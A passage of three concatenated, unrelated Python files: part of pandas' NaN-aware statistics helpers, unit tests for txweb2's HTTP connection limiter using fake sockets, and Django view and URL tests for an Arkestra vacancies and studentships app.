return lib.has_infs_f8(result.ravel())
elif result.dtype == 'f4':
return lib.has_infs_f4(result.ravel())
try:
return np.isinf(result).any()
except (TypeError, NotImplementedError) as e:
# if it doesn't support infs, then it can't have infs
return False
def _get_fill_value(dtype, fill_value=None, fill_value_typ=None):
""" return the correct fill value for the dtype of the values """
if fill_value is not None:
return fill_value
if _na_ok_dtype(dtype):
if fill_value_typ is None:
return np.nan
else:
if fill_value_typ == '+inf':
return np.inf
else:
return -np.inf
else:
if fill_value_typ is None:
return tslib.iNaT
else:
if fill_value_typ == '+inf':
# need the max int here
return np.iinfo(np.int64).max
else:
return tslib.iNaT
def _get_values(values, skipna, fill_value=None, fill_value_typ=None,
isfinite=False, copy=True):
""" utility to get the values view, mask, dtype
if necessary copy and mask using the specified fill_value
copy = True will force the copy """
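    # Returns a 4-tuple (values, mask, dtype, dtype_max): the possibly copied
    # and NA-filled values, the NA mask, the original dtype, and a platform
    # independent accumulator dtype used for reductions.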
values = _values_from_object(values)
if isfinite:
mask = _isfinite(values)
else:
mask = isnull(values)
dtype = values.dtype
dtype_ok = _na_ok_dtype(dtype)
# get our fill value (in case we need to provide an alternative
# dtype for it)
fill_value = _get_fill_value(dtype, fill_value=fill_value,
fill_value_typ=fill_value_typ)
if skipna:
if copy:
values = values.copy()
if dtype_ok:
np.putmask(values, mask, fill_value)
# promote if needed
else:
values, changed = _maybe_upcast_putmask(values, mask, fill_value)
elif copy:
values = values.copy()
values = _view_if_needed(values)
# return a platform independent precision dtype
dtype_max = dtype
if is_integer_dtype(dtype) or is_bool_dtype(dtype):
dtype_max = np.int64
elif is_float_dtype(dtype):
dtype_max = np.float64
return values, mask, dtype, dtype_max
def _isfinite(values):
if _is_datetime_or_timedelta_dtype(values):
return isnull(values)
if (is_complex_dtype(values) or is_float_dtype(values) or
is_integer_dtype(values) or is_bool_dtype(values)):
return ~np.isfinite(values)
return ~np.isfinite(values.astype('float64'))
def _na_ok_dtype(dtype):
return not _is_int_or_datetime_dtype(dtype)
def _view_if_needed(values):
if _is_datetime_or_timedelta_dtype(values):
return values.view(np.int64)
return values
def _wrap_results(result, dtype):
""" wrap our results if needed """
if is_datetime64_dtype(dtype):
if not isinstance(result, np.ndarray):
result = lib.Timestamp(result)
else:
result = result.view(dtype)
elif is_timedelta64_dtype(dtype):
if not isinstance(result, np.ndarray):
result = lib.Timedelta(result)
else:
result = result.astype('i8').view(dtype)
return result
def nanany(values, axis=None, skipna=True):
values, mask, dtype, _ = _get_values(values, skipna, False, copy=skipna)
return values.any(axis)
def nanall(values, axis=None, skipna=True):
values, mask, dtype, _ = _get_values(values, skipna, True, copy=skipna)
return values.all(axis)
@disallow('M8')
@bottleneck_switch(zero_value=0)
def nansum(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna, 0)
the_sum = values.sum(axis, dtype=dtype_max)
the_sum = _maybe_null_out(the_sum, axis, mask)
return _wrap_results(the_sum, dtype)
@disallow('M8')
@bottleneck_switch()
def nanmean(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna, 0)
the_sum = _ensure_numeric(values.sum(axis, dtype=dtype_max))
count = _get_counts(mask, axis)
if axis is not None and getattr(the_sum, 'ndim', False):
the_mean = the_sum / count
ct_mask = count == 0
if ct_mask.any():
the_mean[ct_mask] = np.nan
else:
the_mean = the_sum / count if count > 0 else np.nan
return _wrap_results(the_mean, dtype)
@disallow('M8')
@bottleneck_switch()
def nanmedian(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna)
def get_median(x):
mask = notnull(x)
if not skipna and not mask.all():
return np.nan
return algos.median(_values_from_object(x[mask]))
if values.dtype != np.float64:
values = values.astype('f8')
if axis is None:
values = values.ravel()
notempty = values.size
# an array from a frame
if values.ndim > 1:
# there's a non-empty array to apply over otherwise numpy raises
if notempty:
return _wrap_results(np.apply_along_axis(get_median, axis, values), dtype)
# must return the correct shape, but median is not defined for the
# empty set so return nans of shape "everything but the passed axis"
# since "axis" is where the reduction would occur if we had a nonempty
# array
shp = np.array(values.shape)
dims = np.arange(values.ndim)
ret = np.empty(shp[dims != axis])
ret.fill(np.nan)
return _wrap_results(ret, dtype)
# otherwise return a scalar value
return _wrap_results(get_median(values) if notempty else np.nan, dtype)
def _get_counts_nanvar(mask, axis, ddof):
count = _get_counts(mask, axis)
d = count-ddof
# always return NaN, never inf
if np.isscalar(count):
if count <= ddof:
count = np.nan
d = np.nan
else:
mask2 = count <= ddof
if mask2.any():
np.putmask(d, mask2, np.nan)
np.putmask(count, mask2, np.nan)
return count, d
def _nanvar(values, axis=None, skipna=True, ddof=1):
# private nanvar calculator
mask = isnull(values)
if not _is_floating_dtype(values):
values = values.astype('f8')
count, d = _get_counts_nanvar(mask, axis, ddof)
if skipna:
values = values.copy()
np.putmask(values, mask, 0)
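    # One-pass variance: var = (sum(x**2) - sum(x)**2 / count) / (count - ddof);
    # np.fabs guards against small negative results caused by floating-point
    # cancellation.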
X = _ensure_numeric(values.sum(axis))
XX = _ensure_numeric((values ** 2).sum(axis))
return np.fabs((XX - X ** 2 / count) / d)
@disallow('M8')
@bottleneck_switch(ddof=1)
def nanstd(values, axis=None, skipna=True, ddof=1):
result = np.sqrt(_nanvar(values, axis=axis, skipna=skipna, ddof=ddof))
return _wrap_results(result, values.dtype)
@disallow('M8','m8')
@bottleneck_switch(ddof=1)
def nanvar(values, axis=None, skipna=True, ddof=1):
# we are going to allow timedelta64[ns] here
# but NOT going to coerce them to the Timedelta type
# as this could cause overflow
# so var cannot be computed (but std can!)
return _nanvar(values, axis=axis, skipna=skipna, ddof=ddof)
@disallow('M8','m8')
def nansem(values, axis=None, skipna=True, ddof=1):
var = nanvar(values, axis, skipna, ddof=ddof)
mask = isnull(values)
if not _is_floating_dtype(values):
values = values.astype('f8')
count, _ = _get_counts_nanvar(mask, axis, ddof)
return np.sqrt(var)/np.sqrt(count)
@bottleneck_switch()
def nanmin(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna,
fill_value_typ='+inf')
# numpy 1.6.1 workaround in Python 3.x
if is_object_dtype(values) and compat.PY3:
if values.ndim > 1:
apply_ax = axis if axis is not None else 0
result = np.apply_along_axis(builtins.min, apply_ax, values)
else:
try:
result = builtins.min(values)
except:
result = np.nan
else:
if ((axis is not None and values.shape[axis] == 0)
or values.size == 0):
try:
result = ensure_float(values.sum(axis, dtype=dtype_max))
result.fill(np.nan)
except:
result = np.nan
else:
result = values.min(axis)
result = _wrap_results(result, dtype)
return _maybe_null_out(result, axis, mask)
@bottleneck_switch()
def nanmax(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna,
fill_value_typ='-inf')
# numpy 1.6.1 workaround in Python 3.x
if is_object_dtype(values) and compat.PY3:
if values.ndim > 1:
apply_ax = axis if axis is not None else 0
result = np.apply_along_axis(builtins.max, apply_ax, values)
else:
try:
result = builtins.max(values)
except:
result = np.nan
else:
if ((axis is not None and values.shape[axis] == 0)
or values.size == 0):
try:
result = ensure_float(values.sum(axis, dtype=dtype_max))
result.fill(np.nan)
except:
result = np.nan
else:
result = values.max(axis)
result = _wrap_results(result, dtype)
return _maybe_null_out(result, axis, mask)
def nanargmax(values, axis=None, skipna=True):
"""
Returns -1 in the NA case
"""
values, mask, dtype, _ = _get_values(values, skipna, fill_value_typ='-inf',
isfinite=True)
result = values.argmax(axis)
result = _maybe_arg_null_out(result, axis, mask, skipna)
return result
def nanargmin(values, axis=None, skipna=True):
"""
Returns -1 in the NA case
"""
values, mask, dtype, _ = _get_values(values, skipna, fill_value_typ='+inf',
isfinite=True)
result = values.argmin(axis)
result = _maybe_arg_null_out(result, axis, mask, skipna)
return result
@disallow('M8','m8')
def nanskew(values, axis=None, skipna=True):
mask = isnull(values)
if not _is_floating_dtype(values):
values = values.astype('f8')
count = _get_counts(mask, axis)
if skipna:
values = values.copy()
np.putmask(values, mask, 0)
A = values.sum(axis) / count
B = (values ** 2).sum(axis) / count - A ** 2
C = (values ** 3).sum(axis) / count - A ** 3 - 3 * A * B
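    # A is the mean, B the (biased) variance and C the third central moment;
    # the expression below is the adjusted Fisher-Pearson sample skewness.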
# floating point error
B = _zero_out_fperr(B)
C = _zero_out_fperr(C)
result = ((np.sqrt((count ** 2 - count)) * C) /
((count - 2) * np.sqrt(B) ** 3))
if isinstance(result, np.ndarray):
result = np.where(B == 0, 0, result)
result[count < 3] = np.nan
return result
else:
result = 0 if B == 0 else result
if count < 3:
return np.nan
return result
@disallow('M8','m8')
def nankurt(values, axis=None, skipna=True):
mask = isnull(values)
if not _is_floating_dtype(values):
values = values.astype('f8')
count = _get_counts(mask, axis)
if skipna:
values = values.copy()
np.putmask(values, mask, 0)
A = values.sum(axis) / count
B = (values ** 2).sum(axis) / count - A ** 2
C = (values ** 3).sum(axis) / count - A ** 3 - 3 * A * B
D = (values ** 4).sum(axis) / count - A ** 4 - 6 * B * A * A - 4 * C * A
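    # A is the mean and B, C, D the second, third and fourth central moments;
    # the expression below is the bias-adjusted sample excess kurtosis (G2).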
B = _zero_out_fperr(B)
C = _zero_out_fperr(C)
D = _zero_out_fperr(D)
result = (((count * count - 1.) * D / (B * B) - 3 * ((count - 1.) ** 2)) /
((count - 2.) * (count - 3.)))
if isinstance(result, np.ndarray):
result = np.where(B == 0, 0, result)
result[count < 4] = np.nan
return result
else:
result = 0 if B == 0 else result
if count < 4:
return np.nan
return result
@disallow('M8','m8')
def nanprod(values, axis=None, skipna=True):
mask = isnull(values)
if skipna and not _is_any_int_dtype(values):
values = values.copy()
values[mask] = 1
result = values.prod(axis)
return _maybe_null_out(result, axis, mask)
def _maybe_arg_null_out(result, axis, mask, skipna):
# helper function for nanargmin/nanargmax
if axis is None or not getattr(result, 'ndim', False):
if skipna:
if mask.all():
result = -1
else:
if mask.any():
result = -1
else:
if skipna:
na_mask = mask.all(axis)
else:
na_mask = mask.any(axis)
if na_mask.any():
result[na_mask] = -1
return result
def _get_counts(mask, axis):
if axis is None:
return float(mask.size - mask.sum())
count = mask.shape[axis] - mask.sum(axis)
try:
return count.astype(float)
except AttributeError:
return np.array(count, dtype=float)
def _maybe_null_out(result, axis, mask):
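    # If every value contributing to a reduction was masked (all-NA), replace
    # the result with NaN (upcasting to float/complex if needed) rather than
    # returning the reduction's identity element.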
if axis is not None and getattr(result, 'ndim', False):
null_mask = (mask.shape[axis] - mask.sum(axis)) == 0
if np.any(null_mask):
if np.iscomplexobj(result):
result = result.astype('c16')
else:
result = result.astype('f8')
result[null_mask] = np.nan
else:
null_mask = mask.size - mask.sum()
if null_mask == 0:
result = np.nan
return result
def _zero_out_fperr(arg):
if isinstance(arg, np.ndarray):
return np.where(np.abs(arg) < 1e-14, 0, arg)
else:
return 0 if np.abs(arg) < 1e-14 else arg
@disallow('M8','m8')
def nancorr(a, b, method='pearson', min_periods=None):
"""
a, b: ndarrays
"""
if len(a) != len(b):
raise AssertionError('Operands to nancorr must have same size')
if min_periods is None:
min_periods = 1
valid = notnull(a) & notnull(b)
if not valid.all():
a = a[valid]
b = b[valid]
if len(a) < min_periods:
return np.nan
f = get_corr_func(method)
return f(a, b)
def get_corr_func(method):
if method in ['kendall', 'spearman']:
from scipy.stats import kendalltau, spearmanr
def _pearson(a, b):
return np.corrcoef(a, b)[0, 1]
def _kendall(a, b):
rs = kendalltau(a, b)
if isinstance(rs, tuple):
return rs[0]
return rs
def _spearman(a, b):
return spearmanr(a, b)[0]
_cor_methods = {
'pearson': _pearson,
'kendall': _kendall,
'spearman': _spearman
}
return _cor_methods[method]
@disallow('M8','m8')
def nancov(a, b, min_periods=None):
if len(a) != len(b):
raise AssertionError('Operands to nancov must have same size')
if min_periods is None:
min_periods = 1
valid = notnull(a) & notnull(b)
if not valid.all():
a = a[valid]
b = b[valid]
if len(a) < min_periods:
return np.nan
return np.cov(a, b)[0, 1]
def _ensure_numeric(x):
if isinstance(x, np.ndarray):
if is_integer_dtype(x) or is_bool_dtype(x):
x = x.astype(np.float64)
elif is_object_dtype(x):
try:
x = x.astype(np.complex128)
except Exception:
x = x.astype(np.float64)
else:
if not np.any(x.imag):
x = x.real
elif not (is_float(x) or is_integer(x) or is_complex(x)):
try:
x = float(x)
except Exception:
try:
x = complex(x)
except Exception:
raise TypeError('Could not convert %s to numeric' % str(x))
return x
# NA-friendly array comparisons
import operator
def make_nancomp(op):
def f(x, y):
xmask = isnull(x)
ymask = isnull(y)
mask = xmask | ymask
result = op(x, y)
if mask.any():
if is_bool_dtype(result):
result = result.astype('O')
np.putmask(result, mask, np.nan)
return result
return f
nangt = make_nancomp(operator.gt)
nange = make_nancomp(operator.ge)
nanlt = make_nancomp(operator.lt)
nanle = make_nancomp(operator.le)
naneq = make_nancomp(operator.eq)
nanne = make_nancomp(operator.ne)
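# Illustrative sketch of the NA-friendly semantics (assumes float inputs):
#   naneq(np.array([1.0, np.nan]), np.array([1.0, 2.0]))
# gives an object array [True, nan]: a boolean result is cast to object and every
# position where either operand is null is overwritten with NaN.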
def unique1d(values):
"""
Hash table-based unique
"""
if np.issubdtype(values.dtype, np.floating):
table = _hash.Float64HashTable(len(values))
uniques = np.array(table.unique(_ensure_float64(values)),
dtype=np.float64)
elif np.issubdtype(values.dtype, np.datetime64):
table = _hash.Int64HashTable(len(values))
uniques = table.unique(_ensure_int64(values))
uniques = uniques.view('M8[ns]')
elif np.issubdtype(values.dtype, np.timedelta64):
table = _hash.Int64HashTable(len(values))
uniques = table.unique(_ensure_int64(values))
uniques = uniques.view('m8[ns]')
elif np.issubdtype(values.dtype, np.integer):
table = _hash.Int64HashTable(len(values))
uniques = table.unique(_ensure_int64(values))
else:
table = _hash.PyObjectHashTable(len(values))
uniques = table.unique(_ensure_object(values))
return uniques
|
|
##
# Copyright (c) 2011-2014 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
"""
Tests for txweb2.metafd.
"""
from socket import error as SocketError, AF_INET
from errno import ENOTCONN
from twext.internet import sendfdport
from txweb2 import metafd
from txweb2.channel.http import HTTPChannel
from txweb2.metafd import ReportingHTTPService, ConnectionLimiter
from twisted.internet.tcp import Server
from twisted.application.service import Service
from twext.internet.test.test_sendfdport import ReaderAdder
from txweb2.metafd import WorkerStatus
from twisted.trial.unittest import TestCase
class FakeSocket(object):
"""
A fake socket for testing.
"""
def __init__(self, test):
self.test = test
def fileno(self):
return "not a socket"
def setblocking(self, blocking):
return
def getpeername(self):
if self.test.peerNameSucceed:
return ("4.3.2.1", 4321)
else:
raise SocketError(ENOTCONN, "Transport endpoint not connected")
def getsockname(self):
return ("4.3.2.1", 4321)
class InheritedPortForTesting(sendfdport.InheritedPort):
"""
L{sendfdport.InheritedPort} subclass that prevents certain I/O operations
for better unit testing.
"""
def startReading(self):
"Do nothing."
def stopReading(self):
"Do nothing."
def startWriting(self):
"Do nothing."
def stopWriting(self):
"Do nothing."
class ServerTransportForTesting(Server):
"""
tcp.Server replacement for testing purposes.
"""
def startReading(self):
"Do nothing."
def stopReading(self):
"Do nothing."
def startWriting(self):
"Do nothing."
def stopWriting(self):
"Do nothing."
def __init__(self, *a, **kw):
super(ServerTransportForTesting, self).__init__(*a, **kw)
self.reactor = None
class ReportingHTTPServiceTests(TestCase):
"""
Tests for L{ReportingHTTPService}
"""
peerNameSucceed = True
def setUp(self):
def fakefromfd(fd, addressFamily, socketType):
return FakeSocket(self)
def fakerecvfd(fd):
return "not an fd", "not a description"
def fakeclose(fd):
""
def fakegetsockfam(fd):
return AF_INET
self.patch(sendfdport, 'recvfd', fakerecvfd)
self.patch(sendfdport, 'fromfd', fakefromfd)
self.patch(sendfdport, 'close', fakeclose)
self.patch(sendfdport, 'getsockfam', fakegetsockfam)
self.patch(metafd, 'InheritedPort', InheritedPortForTesting)
self.patch(metafd, 'Server', ServerTransportForTesting)
# This last stubbed out just to prevent dirty reactor warnings.
self.patch(HTTPChannel, "callLater", lambda *a, **k: None)
self.svc = ReportingHTTPService(None, None, None)
self.svc.startService()
def test_quickClosedSocket(self):
"""
If a socket is closed very quickly after being C{accept()}ed, requesting
its peer (or even host) address may fail with C{ENOTCONN}. If this
happens, its transport should be supplied with a dummy peer address.
"""
self.peerNameSucceed = False
self.svc.reportingFactory.inheritedPort.doRead()
channels = self.svc.reportingFactory.connectedChannels
self.assertEqual(len(channels), 1)
self.assertEqual(list(channels)[0].transport.getPeer().host, "0.0.0.0")
class ConnectionLimiterTests(TestCase):
"""
Tests for L{ConnectionLimiter}
"""
def test_loadReducedStartsReadingAgain(self):
"""
L{ConnectionLimiter.statusesChanged} determines whether the current
"load" of all subprocesses - that is, the total outstanding request
count - is high enough that the listening ports attached to it should
be suspended.
"""
builder = LimiterBuilder(self)
builder.fillUp()
self.assertEquals(builder.port.reading, False) # sanity check
self.assertEquals(builder.highestLoad(), builder.requestsPerSocket)
builder.loadDown()
self.assertEquals(builder.port.reading, True)
def test_processRestartedStartsReadingAgain(self):
"""
L{ConnectionLimiter.statusesChanged} determines whether the current
number of outstanding requests is above the limit, and either stops or
resumes reading on the listening port.
"""
builder = LimiterBuilder(self)
builder.fillUp()
self.assertEquals(builder.port.reading, False)
self.assertEquals(builder.highestLoad(), builder.requestsPerSocket)
builder.processRestart()
self.assertEquals(builder.port.reading, True)
def test_unevenLoadDistribution(self):
"""
Subprocess sockets should be selected for subsequent socket sends by
ascending status. Status should sum sent and successfully subsumed
sockets.
"""
builder = LimiterBuilder(self)
# Give one simulated worker a higher acknowledged load than the other.
builder.fillUp(True, 1)
# There should still be plenty of spare capacity.
self.assertEquals(builder.port.reading, True)
# Then slam it with a bunch of incoming requests.
builder.fillUp(False, builder.limiter.maxRequests - 1)
# Now capacity is full.
self.assertEquals(builder.port.reading, False)
# And everyone should have an even amount of work.
self.assertEquals(builder.highestLoad(), builder.requestsPerSocket)
def test_processStopsReadingEvenWhenConnectionsAreNotAcknowledged(self):
"""
L{ConnectionLimiter.statusesChanged} determines whether the current
number of outstanding requests is above the limit.
"""
builder = LimiterBuilder(self)
builder.fillUp(acknowledged=False)
self.assertEquals(builder.highestLoad(), builder.requestsPerSocket)
self.assertEquals(builder.port.reading, False)
builder.processRestart()
self.assertEquals(builder.port.reading, True)
def test_workerStatusRepr(self):
"""
L{WorkerStatus.__repr__} will show all the values associated with the
status of the worker.
"""
self.assertEquals(repr(WorkerStatus(1, 2, 3, 4, 5, 6, 7, 8)),
"<WorkerStatus acknowledged=1 unacknowledged=2 total=3 "
"started=4 abandoned=5 unclosed=6 starting=7 stopped=8>")
def test_workerStatusNonNegative(self):
"""
L{WorkerStatus.adjust} will not allow any of the status counters to go
below zero.
"""
w = WorkerStatus()
w.adjust(
acknowledged=1,
unacknowledged=-1,
total=1,
)
self.assertEquals(w.acknowledged, 1)
self.assertEquals(w.unacknowledged, 0)
self.assertEquals(w.total, 1)
class LimiterBuilder(object):
"""
A L{LimiterBuilder} can build a L{ConnectionLimiter} and associated objects
for a given unit test.
"""
def __init__(self, test, requestsPerSocket=3, socketCount=2):
# Similar to MaxRequests in the configuration.
self.requestsPerSocket = requestsPerSocket
# Similar to ProcessCount in the configuration.
self.socketCount = socketCount
self.limiter = ConnectionLimiter(
2, maxRequests=requestsPerSocket * socketCount
)
self.dispatcher = self.limiter.dispatcher
self.dispatcher.reactor = ReaderAdder()
self.service = Service()
self.limiter.addPortService("TCP", 4321, "127.0.0.1", 5,
self.serverServiceMakerMaker(self.service))
for ignored in xrange(socketCount):
subskt = self.dispatcher.addSocket()
subskt.start()
subskt.restarted()
# Has to be running in order to add stuff.
self.limiter.startService()
self.port = self.service.myPort
def highestLoad(self):
return max(
skt.status.effective()
for skt in self.limiter.dispatcher._subprocessSockets
)
def serverServiceMakerMaker(self, s):
"""
Make a serverServiceMaker for use with
L{ConnectionLimiter.addPortService}.
"""
class NotAPort(object):
def startReading(self):
self.reading = True
def stopReading(self):
self.reading = False
def serverServiceMaker(port, factory, *a, **k):
s.factory = factory
s.myPort = NotAPort()
# TODO: technically, the following should wait for startService
s.myPort.startReading()
factory.myServer = s
return s
return serverServiceMaker
def fillUp(self, acknowledged=True, count=0):
"""
Fill up all the slots on the connection limiter.
@param acknowledged: Should the virtual connections created by this
method send a message back to the dispatcher indicating that the
subprocess has acknowledged receipt of the file descriptor?
@param count: Amount of load to add; defaults to the maximum that the
limiter allows (its C{maxRequests}).
"""
for _ignore_x in range(count or self.limiter.maxRequests):
self.dispatcher.sendFileDescriptor(None, "SSL")
if acknowledged:
self.dispatcher.statusMessage(
self.dispatcher._subprocessSockets[0], "+"
)
def processRestart(self):
self.dispatcher._subprocessSockets[0].stop()
self.dispatcher._subprocessSockets[0].start()
self.dispatcher.statusMessage(
self.dispatcher._subprocessSockets[0], "0"
)
def loadDown(self):
self.dispatcher.statusMessage(
self.dispatcher._subprocessSockets[0], "-"
)
|
|
from datetime import datetime, timedelta
from django.test import TestCase
from django.test.client import Client
from django.test.utils import override_settings
from django.conf import settings
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.http import HttpRequest, QueryDict
from cms.api import create_page
from contacts_and_people.models import Person
from vacancies_and_studentships.models import Vacancy, Studentship
from vacancies_and_studentships.lister import (
List, VacanciesAndStudentshipsPluginLister, FilterList
)
from contacts_and_people.models import Entity
class VacanciesTests(TestCase):
def setUp(self):
# Every test needs a client.
self.client = Client()
self.toothjob = Vacancy(
title = "Pulling teeth",
slug = "pulling-teeth",
date = datetime.now() + timedelta(days=30),
)
def test_generic_attributes(self):
self.toothjob.save()
# the item has no informative content
self.assertEqual(self.toothjob.is_uninformative, True)
# there are no Entities in the database, so this can't be hosted_by anything
self.assertEqual(self.toothjob.hosted_by, None)
# since there are no Entities in the database, fall back to the default template from settings
self.assertEqual(self.toothjob.get_template, settings.CMS_TEMPLATES[0][0])
def test_date_related_attributes(self):
self.toothjob.date = datetime(year=2012, month=12, day=12)
self.assertEqual(self.toothjob.get_when, "December 2012")
def test_link_to_more(self):
self.assertEqual(
self.toothjob.auto_page_view_name,
"vacancies-and-studentships"
)
self.toothjob.hosted_by = Entity(slug="slug")
self.assertEqual(
self.toothjob.link_to_more(),
"/vacancies-and-studentships/slug/"
)
@override_settings(CMS_TEMPLATES = (('null.html', "Null"),))
class VacanciesItemsViewsTests(TestCase):
def setUp(self):
# Every test needs a client.
self.client = Client()
# create a vacancy item
self.toothjob = Vacancy(
title = "Pulling teeth",
slug = "pulling-teeth",
date = datetime.now() + timedelta(days=30),
)
self.adminuser = User.objects.create_user('arkestra', '[email protected]', 'arkestra')
self.adminuser.is_staff=True
self.adminuser.save()
# vacancy tests
def test_unpublished_vacancy_404(self):
self.toothjob.save()
# Issue a GET request.
response = self.client.get('/vacancy/pulling-teeth/')
# Check that the response is 404 because it's not published
self.assertEqual(response.status_code, 404)
def test_unpublished_vacancy_200_for_admin(self):
self.toothjob.save()
# log in a staff user
self.client.login(username='arkestra', password='arkestra')
response = self.client.get('/vacancy/pulling-teeth/')
self.assertEqual(response.status_code, 200)
def test_published_vacancy_200_for_everyone(self):
self.toothjob.published = True
self.toothjob.save()
# Check that the response is 200 OK.
response = self.client.get('/vacancy/pulling-teeth/')
self.assertEqual(response.status_code, 200)
def test_published_vacancy_context(self):
self.toothjob.published = True
self.toothjob.save()
response = self.client.get('/vacancy/pulling-teeth/')
self.assertEqual(response.context['vacancy'], self.toothjob)
@override_settings(CMS_TEMPLATES = (('null.html', "Null"),))
class StudentshipsItemsViewsTests(TestCase):
def setUp(self):
# Every test needs a client.
self.client = Client()
# create a studentship item
self.toothjob = Studentship(
title = "Pulling teeth",
slug = "pulling-teeth",
date = datetime.now() + timedelta(days=30),
)
self.adminuser = User.objects.create_user('arkestra', '[email protected]', 'arkestra')
self.adminuser.is_staff=True
self.adminuser.save()
# studentship tests
def test_unpublished_studentship_404(self):
self.toothjob.save()
# Issue a GET request.
response = self.client.get('/studentship/pulling-teeth/')
# Check that the response is 404 because it's not published
self.assertEqual(response.status_code, 404)
def test_unpublished_studentship_200_for_admin(self):
self.toothjob.save()
# log in a staff user
self.client.login(username='arkestra', password='arkestra')
response = self.client.get('/studentship/pulling-teeth/')
self.assertEqual(response.status_code, 200)
def test_published_studentship_200_for_everyone(self):
self.toothjob.published = True
self.toothjob.save()
# Check that the response is 200 OK.
response = self.client.get('/studentship/pulling-teeth/')
self.assertEqual(response.status_code, 200)
def test_published_studentship_context(self):
self.toothjob.published = True
self.toothjob.save()
response = self.client.get('/studentship/pulling-teeth/')
self.assertEqual(response.context['studentship'], self.toothjob)
class ReverseURLsTests(TestCase):
def test_vacancy_reverse_url(self):
self.assertEqual(
reverse("vacancy", kwargs={"slug": "tooth-puller"}),
"/vacancy/tooth-puller/"
)
def test_studentship_reverse_url(self):
self.assertEqual(
reverse("studentship", kwargs={"slug": "tooth-puller"}),
"/studentship/tooth-puller/"
)
def test_archived_vacancies_base_reverse_url(self):
self.assertEqual(
reverse("vacancies-archive"),
"/archived-vacancies/"
)
def test_archived_vacancies_reverse_url(self):
self.assertEqual(
reverse("vacancies-archive", kwargs={"slug": "some-slug"}),
"/archived-vacancies/some-slug/"
)
def test_current_vacancies_base_reverse_url(self):
self.assertEqual(
reverse("vacancies-current"),
"/vacancies/"
)
def test_current_vacancies_reverse_url(self):
self.assertEqual(
reverse("vacancies-current", kwargs={"slug": "some-slug"}),
"/vacancies/some-slug/"
)
def test_archived_studentships_base_reverse_url(self):
self.assertEqual(
reverse("studentships-archive"),
"/archived-studentships/"
)
def test_archived_studentships_reverse_url(self):
self.assertEqual(
reverse("studentships-archive", kwargs={"slug": "some-slug"}),
"/archived-studentships/some-slug/"
)
def test_current_studentships_base_reverse_url(self):
self.assertEqual(
reverse("studentships-current"),
"/studentships/"
)
def test_current_studentships_reverse_url(self):
self.assertEqual(
reverse("studentships-current", kwargs={"slug": "some-slug"}),
"/studentships/some-slug/"
)
def test_base_reverse_url(self):
self.assertEqual(
reverse("vacancies-and-studentships"),
"/vacancies-and-studentships/"
)
def test_reverse_url(self):
self.assertEqual(
reverse("vacancies-and-studentships", kwargs={"slug": "some-slug"}),
"/vacancies-and-studentships/some-slug/"
)
@override_settings(CMS_TEMPLATES = (('null.html', "Null"),))
class VacanciesStudentshipsEntityPagesViewsTests(TestCase):
def setUp(self):
# Every test needs a client.
self.client = Client()
home_page = create_page(
"School home page",
"null.html",
"en",
published=True
)
self.school = Entity(
name="School of Medicine",
slug="medicine",
auto_vacancies_page=True,
website=home_page
)
# entity vacancies and studentships URLs - has vacancies and studentships pages
def test_main_url(self):
self.school.save()
response = self.client.get('/vacancies-and-studentships/')
self.assertEqual(response.status_code, 200)
def test_entity_url(self):
self.school.save()
response = self.client.get('/vacancies-and-studentships/medicine/')
self.assertEqual(response.status_code, 200)
def test_bogus_entity_url(self):
self.school.save()
response = self.client.get('/vacancies-and-studentships/xxxx/')
self.assertEqual(response.status_code, 404)
def test_main_archive_url(self):
self.school.save()
response = self.client.get('/archived-vacancies/')
self.assertEqual(response.status_code, 200)
def test_entity_vacancies_archive_url(self):
self.school.save()
response = self.client.get('/archived-vacancies/medicine/')
self.assertEqual(response.status_code, 200)
def test_bogus_entity_vacancies_archive_url(self):
self.school.save()
response = self.client.get('/archived-vacancies/xxxx/')
self.assertEqual(response.status_code, 404)
def test_main_archived_studentships_url(self):
self.school.save()
response = self.client.get('/archived-studentships/')
self.assertEqual(response.status_code, 200)
def test_entity_archived_studentships_url(self):
self.school.save()
response = self.client.get('/archived-studentships/medicine/')
self.assertEqual(response.status_code, 200)
def test_bogus_entity_archived_studentships_url(self):
self.school.save()
response = self.client.get('/archived-studentships/xxxx/')
self.assertEqual(response.status_code, 404)
def test_main_all_current_studentships_url(self):
self.school.save()
response = self.client.get('/studentships/')
self.assertEqual(response.status_code, 200)
def test_entity_all_current_studentships_url(self):
self.school.save()
response = self.client.get('/studentships/medicine/')
self.assertEqual(response.status_code, 200)
def test_bogus_entity_all_current_studentships_url(self):
self.school.save()
response = self.client.get('/current-studentships/xxx/')
self.assertEqual(response.status_code, 404)
# entity vacancies and studentships URLs - no vacancies and studentships pages
def test_no_auto_page_main_url(self):
self.school.auto_vacancies_page = False
self.school.save()
response = self.client.get('/vacancies-and-studentships/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_entity_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/vacancies-and-studentships/medicine/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_bogus_entity_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/vacancies-and-studentships/xxxx/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_main_archive_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/archived-vacancies/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_entity_vacancies_archive_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/archived-vacancies/medicine/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_bogus_entity_vacancies_archive_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/archived-vacancies/xxxx/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_main_archived_studentships_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/studentships-archive/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_entity_archived_studentships_url(self):
self.school.auto_vacancies_page= False
self.school.save()
